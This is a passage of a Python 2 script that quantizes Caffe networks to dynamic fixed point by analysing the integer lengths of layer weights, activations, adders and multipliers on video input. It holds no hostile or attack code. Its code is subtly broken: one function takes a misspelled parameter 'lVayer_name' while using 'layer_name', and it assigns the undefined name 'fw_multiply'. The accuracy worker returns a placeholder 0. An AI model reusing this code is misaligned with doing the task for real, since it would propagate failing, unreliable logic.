l.quantization_param.fl_layer_in = int(fl_layer_in)
l.quantization_param.fl_layer_out= int(fl_layer_out)
l.quantization_param.fl_params = int(fl_params)
l.quantization_param.fl_add = int(fl_add)
l.quantization_param.fl_multiply = int(fl_multiply)
return net_proto
def change_layer_BAC_bw(net_proto, lVayer_name,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.bw_add = bw_add
l.quantization_param.fl_add = fl_add
l.quantization_param.bw_multiply = bw_multiply
l.quantization_param.fl_multiply = fw_multiply
return net_proto
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net,layer):
percentile = 0.
layer_param = net.params[layer.name]
#max_weight = max(layer_param[0].data[...].max(), layer_param[0].data[...].min(), key=abs)
weight_sorted = np.sort(layer_param[0].data[...], axis=None)
max_weight = max(weight_sorted[int(len(weight_sorted)*percentile)], weight_sorted[-1*int(len(weight_sorted)*percentile)],key=abs)
if layer.convolution_param.bias_term:
bias_sorted = np.sort(layer_param[1].data[...], axis=None)
max_bias = max(bias_sorted[int(len(bias_sorted)*percentile)], bias_sorted[-1*int(len(bias_sorted)*percentile)],key=abs)
#max_bias = max(layer_param[1].data[...].max(), layer_param[1].data[...].min(), key=abs)
else:
max_bias = 0
#print layer.name, max_weight, max(weight_sorted[0],weight_sorted[-1],key=abs), max(weight_sorted[int(len(weight_sorted)/100)], weight_sorted[-1*int(len(weight_sorted)/100)],key=abs)
max_param = max(max_weight, max_bias, key=abs)
return math.ceil(math.log(abs(max_param), 2)) + 1
def analyze_net_param_IL(net, net_proto):
net_param_IL = dict()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'NdConvolutionIVS' \
or layer.type == 'DeconvolutionRistretto':
net_param_IL[layer.name] = calc_layer_param_IL(net, layer)
return net_param_IL
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
layer_output = net.blobs[layer_bottom_name].data
layer_output_max = abs(max(layer_output.max(), layer_output.min(), key=abs))
#if layer_bottom_name == 'data':
# print net.blobs[layer_bottom_name].data
# print math.ceil(math.log(layer_output_max, 2)) + 1
return math.ceil(math.log(layer_output_max, 2)) + 1
def video_list_to_blob(videos):
"""Convert a list of videos into a network input.
Assumes videos are already prepared (means subtracted, BGR order, ...).
"""
shape = videos[0].shape
num_videos = len(videos)
blob = np.zeros((num_videos, shape[0], shape[1], shape[2], shape[3]),
dtype=np.float32)
for i in xrange(num_videos):
blob[i] = videos[i]
# Move channels (axis 3) to axis 1
# Axis order will become: (batch elem, channel, length, height, width)
channel_swap = (0, 3, 4, 1, 2)
blob = blob.transpose(channel_swap)
return blob
def _get_image_blob(im):
"""Converts an image into a network input.
Arguments:
im (ndarray): a color image in BGR order
Returns:
blob (ndarray): a data blob holding an image pyramid
im_scale_factors (list): list of image scales (relative to im) used
in the image pyramid
"""
im_orig = im.astype(np.float32, copy=True)
for i in range(im_orig.shape[-1]):
img = im_orig[:,:,:,i]
img -= [ 90, 98, 102]
im_orig[:,:,:,i] = img
processed_ims = []
processed_ims.append(im_orig)
# Create a blob to hold the input images
blob = video_list_to_blob(processed_ims)
return blob
def _get_blobs(im):
"""Convert an image and RoIs within that image into network inputs."""
blobs = {'data' : None, 'rois' : None}
blobs['data']= _get_image_blob(im)
return blobs
def analyze_net_output_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_output_IL = dict()
net_input_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto' \
or layer.type == 'NdConvolutionIVS' :
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_output_IL[layer.name] = -sys.maxint - 1
net_input_IL[layer.name] = -sys.maxint - 1
cap = cv2.VideoCapture(video_name)
count = 0
width = 720
height = 480
CNNwidth = 112
CNNheight = 112
length = 16
image_queue = np.zeros((CNNheight, CNNwidth,3,length), dtype=np.float32)
while(cap.isOpened()):
ret, frame = cap.read()
if ret:
frame = cv2.resize(frame, (width, height), interpolation = cv2.INTER_LINEAR)
_frame = cv2.resize(frame, (CNNwidth, CNNheight), interpolation = cv2.INTER_LINEAR)
if count == 0:
for i in range(length):
image_queue[:,:,:,i] = _frame
else:
image_queue[:,:,:,:length-1] = image_queue[:,:,:,1:]
image_queue[:,:,:,length-1] = _frame
blobs = _get_blobs(image_queue)
net.blobs['data'].reshape(*(blobs['data'].shape))
net.blobs['data'].data[...] = blobs['data']
blobs_out = net.forward()
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'NdConvolutionIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
else:
break
count += 1
print count
return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
layer_adder_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[0],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[1],
key=abs))
return math.ceil(math.log(layer_adder_max, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
layer_multiplier_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[2],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[3],
key=abs))
return math.ceil(math.log(layer_multiplier_max, 2)) + 1
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_adder_IL = dict()
net_multiplier_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' :
net_adder_IL[layer.name] = -sys.maxint - 1
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_multiplier_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
net_adder_IL[layer.name])
net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
net_multiplier_IL[layer.name])
return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
adder_IL = net_adder_IL[layer.name] + extra_IL
adder_FL = adder_bw - adder_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
adder_bw, adder_FL, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
multiplier_FL = multiplier_bw - multiplier_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
multiplier_bw, multiplier_FL, \
)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
input_bw = output_bw;
#input_FL = 0;
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'NdConvolutionIVS' \
or layer.type == 'DeconvolutionRistretto':
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name] + extra_IL
input_FL = input_bw - input_IL
#if layer.name=='conv1_1/conv':
# print input_IL,output_IL
#print layer.name
#if layer.name == 'conv1_1/conv':
# print output_IL
# continue
change_layer_bw(net_proto, layer.name, \
input_bw, input_FL, \
output_bw, output_FL, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#input_FL = output_FL
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'FcIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'DeconvolutionRistretto':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize NdConvolution layer in network
def quantize_net_ndconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'NdConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
net_proto = caffe_pb2.NetParameter()
fn = ori_net_path;
with open(fn) as f:
s = f.read()
txtf.Merge(s, net_proto)
return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
outf = out_net_path
#print 'writing', outf
with open(outf, 'w') as f:
f.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
return ap
#print each layer name and spec
def print_net_layer_names(net):
print("Network layers:")
for name, layer in zip(net._layer_names, net.layers):
if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
print dir(layer)
print layer.reshape
print layer.convolution_param
print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
#caffe.set_mode_cpu()
#GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
#cfg.GPU_ID = GPU_ID
#caffe.set_device(GPU_ID)
#caffe.set_mode_gpu()
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
#ap_string = check_output('./caffe-fast-rcnn-c3d/caffe-fast-rcnn-2/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True)
#ap_string = check_output('./caffe-fast-rcnn-c3d/caffe-fast-rcnn-2/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(30) + ' -gpu='+str(GPU_ID),shell=True)
print 'NOT IMPLEMENT'
ap = 0.
#if len(ap_string) != 0:
# ap = float(ap_string)
#ap = test_qnet(net_path, args.caffemodel, imdb)
#ap = test_qnet(net_path, args.caffemodel, imdb)
shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
#caffe.set_mode_cpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto)
for t in net_output_IL_.keys():
net_output_IL[t] = net_output_IL_[t]
for t in net_input_IL_.keys():
net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
#caffe.set_mode_cpu()
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC)
for t in net_adder_IL_.keys():
net_adder_IL[t] = net_adder_IL_[t]
for t in net_multiplier_IL_.keys():
net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
net_param_IL_ = analyze_net_param_IL(net, net_proto)
for t in net_param_IL_.keys():
net_param_IL[t] = net_param_IL_[t]
if __name__ == '__main__':
args = parse_args()
num_iters = 4952
video_name = args.video
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
print('Using config:')
pprint.pprint(cfg)
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
print 'Create quantized prototxt'
print 'Testing Full Precision Accuracy'
manager = multiprocessing.Manager()
shared_dict = manager.dict()
GPU1 = 3
GPU2 = 3
#p = multiprocessing.Process(target=mAP_worker, args=('FP-FP-FP-FP-FP', args.prototxt, shared_dict, GPU1))
timer = Timer()
#timer.tic()
#p.start()
#p.join()
#timer.toc()
#print ('Took {:.3f}s').format(timer.total_time)
#full_ap = shared_dict['FP-FP-FP-FP-FP']
#full_ap = 0.572219
#print 'Full precision accuracy : {}'.format(full_ap)
# Bit Width for Analyze
bw_range_conv = [8, 4] #bit width for convolution layers
bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
bw_conv = 6 #just initial
bw_deconv = 6 #just initial
bw_fc = 6 #just initial
bw_ndconv = 6 #just initial
bw_output = 6 #just initial
bw_adder = 32 #just initial
bw_multiplier = 32 #just initial
convIL_reduction =0
deconvIL_reduction = 0
fcIL_reduction = 0
ndconvIL_reduction = 0
actIL_reduction = 0
adderIL_reduction = 0
multIL_reduction = 0
print 'Analyzing network'
net_proto = read_from_prototxt(args.prototxt)
has_conv, has_deconv, has_fc, has_ndconv = analyze_network(net_proto)
print 'Network Structure'
print 'CONV:{}, DECONV:{}, FC:{} NDCONV:{}'.format(has_conv, has_deconv, has_fc, has_ndconv)
print '-----------------------------------'
net_proto = read_from_prototxt(args.prototxt_quantized)
print 'Analyzing network parameter IL'
net_param_IL = manager.dict()
p = multiprocessing.Process(target=analyze_net_param_IL_worker,
args=(net_param_IL, GPU1, ))
p.start()
p.join()
with open('param_analysis.json', 'w') as outfile:
param_analysis = dict()
param_analysis['net_param_IL'] = dict()
for t in net_param_IL.keys():
param_analysis['net_param_IL'][t] = net_param_IL[t]
json.dump(param_analysis, outfile)
#sys.exit(0)
# Analyze Convolution and DeConvolution Layers
#if has_conv:
# print 'Analyzing CONV and DECONV'
# print '\tbit width\t accuracy'
# i = 5
# not_found = True
# while not_found:
# timer = Timer()
# timer.tic()
# jobs = []
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_conv(net_proto, net_param_IL, i, convIL_reduction)
# quantize_net_deconv(net_proto, net_param_IL, i, deconvIL_reduction)
# write_to_prototxt(net_proto, './temp'+str(i)+'.prototxt')
# p1 = multiprocessing.Process(target=mAP_worker, args=(str(i)+'-32-32-32-32',
# './temp'+str(i)+'.prototxt',
# shared_dict,GPU1))
# jobs.append(p1)
# p1.start()
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_conv(net_proto, net_param_IL, i+1, convIL_reduction)
# quantize_net_deconv(net_proto, net_param_IL, i+1, deconvIL_reduction)
# write_to_prototxt(net_proto, './temp'+str(i+1)+'.prototxt')
# p2 = multiprocessing.Process(target=mAP_worker, args=(str(i+1)+'-32-32-32-32',
# './temp'+str(i+1)+'.prototxt',
# shared_dict,GPU2))
# jobs.append(p2)
# p2.start()
# for proc in jobs:
# proc.join()
# timer.toc()
# for j in range(i, i+2):
# print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict[str(j)+'-32-32-32-32'],timer.total_time)
# for j in range(i, i+2):
# if shared_dict[str(j)+'-32-32-32-32'] > (full_ap - args.error_margin):
# bw_conv = j
# not_found = False
# break;
# i = i + 2
# Analyze Convolution and DeConvolution Layers
#if has_conv:
# print 'Analyzing CONV and DECONV'
# print '\tbit width\t accuracy'
# bw_h = 16
# bw_l = 0
# bw = 16
# while True:
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_conv(net, net_proto, net_param_IL, bw)
# quantize_net_deconv(net, net_proto, net_param_IL, bw)
# write_to_prototxt(net_proto, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_conv = bw
# if bw_h - bw_l <= 1:
# break
# bw = bw_l + (bw_h-bw_l)/2
# Analyze Fully Connected Layers
#if has_fc:
# print 'Analyzing FC'
# print '\tbit width\t accuracy'
# i = 3
# not_found = True
# while not_found:
# timer = Timer()
# timer.tic()
# jobs = []
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_fc(net_proto, net_param_IL, i, fcIL_reduction)
# write_to_prototxt(net_proto, './temp'+str(i)+'.prototxt')
# p1 = multiprocessing.Process(target=mAP_worker, args=('32-'+str(i)+'-32-32-32',
# './temp'+str(i)+'.prototxt',
# shared_dict,GPU1))
# jobs.append(p1)
# p1.start()
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_fc(net_proto, net_param_IL, i+1, fcIL_reduction)
# write_to_prototxt(net_proto, './temp'+str(i+1)+'.prototxt')
# p2 = multiprocessing.Process(target=mAP_worker, args=('32-'+str(i+1)+'-32-32-32',
# './temp'+str(i+1)+'.prototxt',
# shared_dict,GPU2))
# jobs.append(p2)
# p2.start()
# for proc in jobs:
# proc.join()
# timer.toc()
# for j in range(i, i+2):
# print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-'+str(j)+'-32-32-32'],timer.total_time)
# for j in range(i, i+2):
# if shared_dict['32-'+str(j)+'-32-32-32'] > (full_ap - args.error_margin):
# bw_fc = j
# not_found = False
# break;
# i = i + 2
# Analyze Fully Connected Layers
#if has_fc:
# print 'Analyzing FC'
# print '\tbit width\t accuracy'
# bw_h = 16
# bw_l = 0
# bw = 16
# while True:
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_fc(net, net_proto, net_param_IL, bw)
# write_to_prototxt(net_proto, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_fc = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
# Analyze input and output of layers
#net_proto = read_from_prototxt(args.prototxt_quantized)
#quantize_net_conv(net, net_proto, net_param_IL, bw_conv, -1)
#quantize_net_deconv(net, net_proto, net_param_IL, bw_conv, -1)
#quantize_net_fc(net, net_proto, net_param_IL, bw_fc, -1)
#write_to_prototxt(net_proto, args.prototxt_quantized)
net_output_IL = manager.dict()
net_input_IL = manager.dict()
if args.act_analysis == None:
print 'Analyzing network output IL'
p = multiprocessing.Process(target=analyze_net_output_IL_worker,
args=(net_output_IL, net_input_IL, GPU1))
p.start()
p.join()
with open('act_analysis.json', 'w') as outfile:
act_analysis = dict()
act_analysis['net_output_IL'] = dict()
act_analysis['net_input_IL'] = dict()
for t in net_output_IL.keys():
act_analysis['net_output_IL'][t] = net_output_IL[t]
for t in net_input_IL.keys():
act_analysis['net_input_IL'][t] = net_input_IL[t]
json.dump(act_analysis, outfile)
else:
print 'Loading network output IL'
with open(args.act_analysis) as json_data:
act_analysis = json.load(json_data)
for t in act_analysis['net_output_IL'].keys():
net_output_IL[t] = act_analysis['net_output_IL'][t]
for t in act_analysis['net_input_IL'].keys():
net_input_IL[t] = act_analysis['net_input_IL'][t]
#print 'Analyzing layer output'
#print '\tbit width\t accuracy'
#i = 3
#not_found = True
#while not_found:
# timer = Timer()
# timer.tic()
# jobs = []
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_output(net_proto, net_output_IL, net_input_IL, i, actIL_reduction)
# write_to_prototxt(net_proto, './temp'+str(i)+'.prototxt')
# p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-'+str(i)+'-32-32',
# './temp'+str(i)+'.prototxt',
# shared_dict,GPU1))
# jobs.append(p1)
# p1.start()
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_output(net_proto, net_output_IL, net_input_IL, i+1, actIL_reduction)
# write_to_prototxt(net_proto, './temp'+str(i+1)+'.prototxt')
# p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-'+str(i+1)+'-32-32',
# './temp'+str(i+1)+'.prototxt',
# shared_dict,GPU2))
# jobs.append(p2)
# p2.start()
# for proc in jobs:
# proc.join()
# timer.toc()
# for j in range(i, i+2):
# print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-'+str(j)+'-32-32'],timer.total_time)
# for j in range(i, i+2):
# if shared_dict['32-32-'+str(j)+'-32-32'] > (full_ap - args.error_margin):
# bw_output = j
# not_found = False
# break;
# i = i + 2
# Analyze input and output of layers
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer output'
#print '\tbit width\t accuracy'
#while True:
# net_proto = read_from_prototxt(args.prototxt_quantized)
# quantize_net_output(net, net_proto, net_output_IL, net_input_IL, bw)
# write_to_prototxt(net_proto, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_output = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
#Create 8-bit quantization model
#if bw_conv < 8:
# bw_conv = 8
#if bw_fc < 8:
# bw_fc = 8
#if bw_output < 8:
# bw_output = 8
#Make Final Quantized Prototxt
print 'Final Quantization Testing'
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, convIL_reduction)
quantize_net_deconv(net_proto, net_param_IL, bw_conv, deconvIL_reduction)
quantize_net_fc(net_proto, net_param_IL, bw_fc, fcIL_reduction)
quantize_net_ndconv(net_proto, net_param_IL, bw_ndconv, ndconvIL_reduction)
quantize_net_output(net_proto, net_output_IL, net_input_IL, bw_output, actIL_reduction)
write_to_prototxt(net_proto, './temp.prototxt')
#p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-32-32', './temp.prototxt',
# shared_dict, GPU1))
#p.start()
#p.join()
#ap = shared_dict['DQ-DQ-DQ-32-32']
#layer_ap = ap
#ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit CONV, {}bit FC, {}bit layer output'.format(bw_conv, bw_fc, bw_output)
#print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print 'Please fine-tune'
write_to_prototxt(net_proto, args.prototxt_quantized)
print 'Quantized Model saved to', args.prototxt_quantized
sys.exit(0)
print 'Create Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Bit-Accurate quantized prototxt'
#print 'Analyzing network adder and multiplier'
net_adder_IL = manager.dict()
net_multiplier_IL = manager.dict()
if args.accumulator_analysis == None:
print 'Analyzing network adder and multiplier'
p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
args=(net_adder_IL, net_multiplier_IL, GPU1))
p.start()
p.join()
with open('accumulator_analysis.json', 'w') as outfile:
accumulator_analysis = dict()
accumulator_analysis['net_adder_IL'] = dict()
accumulator_analysis['net_multiplier_IL'] = dict()
for t in net_adder_IL.keys():
accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
for t in net_multiplier_IL.keys():
accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
json.dump(accumulator_analysis, outfile)
else:
print 'Loading network adder and multiplier analysis file'
with open(args.accumulator_analysis) as json_data:
accumulator_analysis = json.load(json_data)
for t in accumulator_analysis['net_adder_IL'].keys():
net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
for t in accumulator_analysis['net_multiplier_IL'].keys():
net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
print 'Analyzing layer multiplier'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
